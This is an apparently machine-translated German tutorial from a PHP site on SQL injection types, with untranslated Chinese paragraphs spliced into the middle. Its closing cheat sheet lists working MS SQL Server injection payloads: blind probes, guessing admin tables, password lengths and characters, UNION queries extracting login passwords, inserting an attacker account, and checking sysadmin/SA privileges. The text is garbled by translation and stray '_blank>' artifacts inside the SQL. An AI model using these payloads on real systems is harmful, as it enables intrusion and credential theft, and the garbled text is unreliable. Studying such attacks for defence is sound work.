Heim  >  Artikel  >  Datenbank  >  Was ist eine SQL-Injection-Anweisung?

Was ist eine SQL-Injection-Anweisung?

藏色散人
藏色散人Original
2021-03-10 14:01:3837503Durchsuche

Es gibt drei Arten von SQL-Injection-Anweisungen, nämlich: 1. Numerischer Injektionspunkt mit Anweisungen wie „Wählen Sie * aus Tabellennamen aus, wobei ID=1 und 1=1“ sind. 2. Zeichen-Injection-Punkte mit Anweisungen wie „ Wählen Sie * aus der Tabelle aus, in der Name..."; 3. Injektionspunkt suchen.

Was ist eine SQL-Injection-Anweisung?

Die Betriebsumgebung dieses Artikels: Windows 7-System, SQL Server 2016-Version, Dell G3-Computer.

Allgemeine SQL-Injection-Anweisungen

SQL-Injection

1. Was ist SQL-Injection? Durch das Einfügen von SQL-Befehlen in Webformularübermittlungen oder die Eingabe von Abfragezeichenfolgen für Domänennamen oder Seitenanforderungen wird der Server letztendlich dazu verleitet, bösartiges SQL auszuführen Befehl.

2. SQL-Injection-Typen

werden nach dem Injektionspunkttyp klassifiziert

(1) Numerischer Injektionspunkt

Viele Weblinks haben eine ähnliche Struktur http://xxx.com/users.php?id=1 Basierend Diese Form der Injektion wird im Allgemeinen als digitaler Injektionspunkt bezeichnet, da der Typ der Injektionspunkt-ID eine Zahl ist. Auf den meisten Webseiten, z. B. zum Anzeigen persönlicher Benutzerinformationen, zum Anzeigen von Artikeln usw., wird diese Form der Struktur zum Übergeben verwendet ID Warten Sie, bis die Informationen an das Backend übergeben werden, fragen Sie die entsprechenden Informationen in der Datenbank ab und geben Sie sie an das Frontend zurück. Der Prototyp dieser Art von SQL-Anweisung ist wahrscheinlich select * from table name where id=1. Wenn eine Injektion vorliegt, können wir für das Sprengen eine SQL-Injection-Anweisung ähnlich der folgenden erstellen: select * aus Tabelle Name, wobei id=1 und 1=1

(2) Zeicheninjektionspunkt

select * from 表名 where id=1 若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where id=1 and 1=1

(2)字符型注入点

网页链接有类似的结构 http://xxx.com/users.php?name=admin 这种形式,其注入点 name 类型为字符类型,所以叫字符型注入点。这一类的 SQL 语句原型大概为 select * from 表名 where name='admin' 值得注意的是这里相比于数字型注入类型的sql语句原型多了引号,可以是单引号或者是双引号。若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where name='admin' and 1=1 ' 我们需要将这些烦人的引号给处理掉。

(3)搜索型注入点

这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数,一般在链接地址中有 "keyword=关键字" 有的不显示在的链接地址里面,而是直接通过搜索框表单提交。此类注入点提交的 SQL 语句,其原形大致为:select * from 表名 where 字段 like '%关键字%' 若存在注入,我们可以构造出类似与如下的sql注入语句进行爆破:select * from 表名 where 字段 like '%测试%' and '%1%'='%1%'Der Weblink hat eine ähnliche Struktur http://xxx.com/users . In der Form php?name=admin ist der Namenstyp des Injektionspunkts ein Zeichentyp, daher wird er als Zeicheninjektionspunkt bezeichnet. Der Prototyp dieser Art von SQL-Anweisung ist wahrscheinlich select * from table name where name='admin'. Es ist erwähnenswert, dass es im Vergleich zum Prototyp der numerischen Injektions-SQL-Anweisung mehr Anführungszeichen gibt. Dies können einfache Anführungszeichen oder doppelte Anführungszeichen sein. Wenn es eine Injektion gibt, können wir eine SQL-Injection-Anweisung ähnlich der folgenden erstellen, um sie zu sprengen: select * from table name where name='admin' and 1=1 ' Wir müssen uns mit diesen lästigen Zitaten auseinandersetzen Markierungen verlieren.

(3) Injektionspunkt suchen

Dies ist eine besondere Art der Injektion. Diese Art der Injektion bezieht sich hauptsächlich darauf, dass die Suchparameter bei der Durchführung von Datensuchen nicht gefiltert werden. Im Allgemeinen ist "keyword=keyword" in der Linkadresse enthalten Durchsucht durch Box-Formulareinreichung. Der Prototyp der von dieser Art von Injektionspunkt übermittelten SQL-Anweisung lautet ungefähr: select * from table name where field like '%keyword%' Wenn eine Injektion vorliegt, können wir eine SQL-Injection-Anweisung ähnlich wie erstellen die folgende Explosion: wählen Sie * aus dem Tabellennamen aus, wobei Felder wie „%test%“ und „%1%“ = „%1%“ sind

Klassifizieren Sie entsprechend der Art und Weise, wie Daten übermittelt werden

(1) GET-Injektion

Der Weg zum Übermitteln von Daten ist GET, und die Position des Injektionspunkts befindet sich im GET-Parameterabschnitt. Beispielsweise gibt es einen solchen Link: http://xxx.com/news.php?id=1, id ist der Injektionspunkt.

(2) POST-InjektionVerwenden Sie die POST-Methode, um Daten zu übermitteln. Der Injektionspunkt befindet sich im POST-Datenteil, der häufig in Formularen vorkommt.

(3) Cookie-Injektion

HTTP-Anfrage bringt das Cookie des Clients und der Injektionspunkt befindet sich in einem bestimmten Feld im Cookie.

(4) HTTP-Header-Injektion

Der Injektionspunkt befindet sich in einem bestimmten Feld im HTTP-Anforderungsheader. Beispielsweise ist es im Feld „User-Agent“ vorhanden. Streng genommen sollte Cookie eigentlich als eine Form der Header-Injection betrachtet werden. Denn bei HTTP-Anfragen ist Cookie ein Feld im Header.

Klassifiziert nach Ausführungseffekt

(1) Boolesche Blindinjektion

ist eine Injektion, die anhand der Rückgabeseite bestimmen kann, ob die Bedingung wahr oder falsch ist.

(2) Zeitbasierte Blindinjektion

bedeutet, dass Sie keine Informationen anhand des von der Seite zurückgegebenen Inhalts beurteilen können. Sie können bedingte Anweisungen verwenden, um zu überprüfen, ob die Zeitverzögerungsanweisung ausgeführt wird (dh ob die Seite zurückgegeben wird). die Zeit nimmt zu).

(3) Injektion basierend auf Fehlerberichten
  1. Das heißt, die Seite gibt Fehlerinformationen zurück oder das Ergebnis der injizierten Anweisung wird direkt an die Seite zurückgegeben.
  2. Einfache Anführungszeichen
  3. Doppelte Anführungszeichen

Basierend auf numerischer Injektion

(4) Union-Abfrageinjektion

Sie können die Injektion im Falle einer Vereinigung verwenden.

Häufig verwendete Anweisungen

1.判断有无注入点 
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等.. 
and 0<>(select count(*) from *) 
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 
and 0<(select count(*) from admin) 
and 1<(select count(*) from admin)
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. 
and 1=(select count(*) from admin where len(*)>0)-- 
and 1=(select count(*) from admin where len(用户字段名称name)>0) 
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 
and 1=(select count(*) from admin where len(*)>0) 
and 1=(select count(*) from admin where len(name)>6) 错误 
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6 
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确 
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 
and 1=(select count(*) from admin where len(password)=12) 正确
6.猜解字符 
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- 
这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
group by users.id having 1=1-- 
group by users.id, users.username, users.password, users.privs having 1=1-- 
; insert into users values( 666, attacker, foobar, 0xffff )--
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable- 
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
>_id)- 
UNION SELECT TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS
WHERE TABLE_blank>_NAME=logintable WHERE COLUMN_blank>_NAME NOT IN (login_blank
>_id,login_blank>_name)- 
UNION SELECT TOP 1 login_blank>_name FROM logintable- 
UNION SELECT TOP 1 password FROM logintable where login_blank>_name=Rahul--
看_blank>服务器打的补丁=出错了打了SP4补丁 
and 1=(select @@VERSION)--
看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。 
and 1=(SELECT IS_blank>_SRVROLEMEMBER(sysadmin))--
判断连接_blank>数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) 
and sa=(SELECT System_blank>_user)-- 
and user_blank>_name()=dbo-- 
and 0<>(select user_blank>_name()--

Empfohlen (kostenlos): 🎜SQL-Tutorial🎜🎜

Das obige ist der detaillierte Inhalt vonWas ist eine SQL-Injection-Anweisung?. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn